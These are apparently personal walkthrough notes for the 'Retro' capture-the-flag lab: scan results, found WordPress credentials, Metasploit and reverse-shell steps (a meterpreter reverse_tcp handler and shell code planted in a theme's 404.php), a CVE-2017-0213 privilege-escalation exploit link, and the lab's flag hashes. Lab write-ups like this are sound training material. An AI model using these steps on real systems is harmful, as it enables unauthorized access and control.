[Retro Hard room]
[Nmap]
80/tcp   open  http          Microsoft IIS httpd 10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services

[Gobuster]
/retro

[Gaining Access]
http://10.10.114.125/retro/index.php/2019/12/09/ready-player-one/#comment-2
user:wade
pass:parzival

[Metasploit]
==============================================
#didnt work.
>msfconsole
>use exploit/unix/webapp/wp_admin_shell_upload
>set rhosts <Attacker ip-here>
>set username wade
>set password parzival
>set targeturi /wordpress
>exploit
===============================================
msf6 exploit(multi/handler) > set LHOST 10.4.30.186 
LHOST => 10.4.30.186
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.4.30.186:4444 
[*] Sending stage (39282 bytes) to 10.10.172.148
[*] Meterpreter session 5 opened (10.4.30.186:4444 -> 127.0.0.1) at 2021-04-05 23:19:16 +0000
[*]  - Meterpreter session 5 closed.  Reason: Died<==
===============================================
[Reverse Shell]
#TRIAL && ERROR
Appearance > 404.php > Place Revshell code
nc -lvp 4444
http://10.10.182.7/retro/wp-content/themes/90s-retro/404.php
#RDP Worked!!!
xfreerdp /u:wade /v:10.10.172.148
user flag:3b99fbdc6d430bfb51c72c651a261927

[Privelage Escalation]
https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213
Exploit:CVE-2017-0213_x64.zip
#Transfer the exploit to the Target Machine
CVE-2017-0213_x64.zip
cd C:\Users\Administrator\Desktop\
dir
root.txt:7958b569565d7bd88d10c6f22d1c4063
